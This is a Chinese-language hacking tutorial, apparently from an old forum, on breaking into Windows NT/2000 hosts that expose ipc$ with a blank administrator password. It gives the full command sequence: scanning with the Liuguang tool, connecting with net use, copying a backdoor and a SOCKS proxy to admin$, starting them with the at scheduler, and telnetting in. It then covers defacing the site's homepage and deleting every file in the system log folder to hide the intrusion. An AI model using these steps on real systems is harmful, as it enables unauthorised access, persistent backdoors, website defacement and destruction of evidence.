NT的简单攻击（ＩＩ）流光攻击ipc$主机

NT的简单攻击（ＩＩ）流光攻击ipc$主机

<script language="javascript" src="/ads/tech78_body1.js" type="text/javascript"></script>

最近很懒，好长时间没写原创了，今天写个流光攻击ipc$的主机吧，可能有的朋友要问攻击ipc$的主机与QQ有什么关系呢？呵呵，一会你就知道了 　　首先用流光扫描一段ip，目标，台独分子网站，ipc是什么？你也太差了，连这个都不知道，ipc是进程间通信呗，是连接server到server之间通信用的，ipc$也就是win2k默认开的共享，唉呀，不说了，只要你知道有这个ipc就行了。 一会儿，流光扫描完毕，询问是否查看入侵报告，确定，哈哈，扫到了不少ipc$的主机，随便拿来个user:administrator(admin) password:(null)的主机，(如图) 呵呵，这个administrator还是超级权限呢，你问我是怎么知道的？拷，流光告诉我的呗，user:administrator(admin)这个(admin)就是说明administrator这个用户具有超级权限！不废话了，既然用户名，密码知道了，那就开始工作吧，打开开始--附件--c命令提示符，也就是cmd，在c:/下输入net use //x.x.x.x/ipc$ /user:"administrator"回车。显示密码和用户名在//x.x.x.x/ipc$上无效，请键入 //x.x.x.x/ipc$的用户名和密码。刚才我们看到的密码不是null吗？只要敲一下回车就可以了，显示命令成功完成，(如图) 现在我们要做的是copy几个exe到肉机下，输入copy f:/a/srv.exe //x.x.x.x/admin$显示已复制一个文件。copy f:/a/sksockserver.exe //x.x.x.x/admin$显示已复制一个文件，这样我们就将这两个exe复制到肉机的c:/winnt目录下了，现在我们用at命令来启动srv.这个后门，登陆到肉机的99端口，先用net time //x.x.x.x 查看一下远程服务器的时间，显示//x.x.x.x当前时间是2002/1/1 下午 2:00, 输入at //x.x.x.x 14:02 srv.exe显示新加了一项作业 其作业id=1.也就是说在14:02的时侯启动这个srv.好，倒计时开始，3.2.1.时间到，输入telnet x.x.x.x 99回车。哈哈，进去了，是否对方的c:/winnt/system32提示符出现了.开始安装刚刚拷贝过去的sksockserver.exe吧!啊？cmd打不字了？盲操做，发挥发挥你丰富的想像力吧，输入sksockserver.exe -install 显示snake sockproxy service installed 启动它，net start skserver 显示snake sockproxy service (如图） 另外，既然你现在是这台主机上的webmaster，你还可以干点别的吧，可以开个后门，以后干活方便，里应外合，copy个木马，用小马马控制他， 黑他的主页，主页一般在c:/inetpub/wwwroot目录下，一般默认文件名为index.htm default.htm。index.asp default.asp.以我的经验：主页放在默认目录的很少，告诉你一个小窍门，主页一般不都有返回道页这一栏吗？你把鼠标放在上面就可以看到他的主页路径了，找到最后的文件名，比如最后的文件名叫default.asp 用dir default.asp/s命令在每一个盘符下查找，找到之后用一下ren default.asp default.ccb 然后在刷新一下url.看看是否找不到主页了，如果找不到此页就对了！找到文件后就可以在dos下传主页了。 copy f:/index.htm //x.x.x.x/c$/inetpub/wwwroot下，覆盖原文件就可以了，这里我就不在赘述了！(如图）  最后别忘了ＤＥＬ掉日志。　我个人建议……要抹就抹个干净……只要是在Ｃ：＼ＷＩＮＮＴ＼ＳＹＳＴＥＭ３２＼ＬＯＧＦＩＬＥＳ下的＊．＊，全部删掉！~~~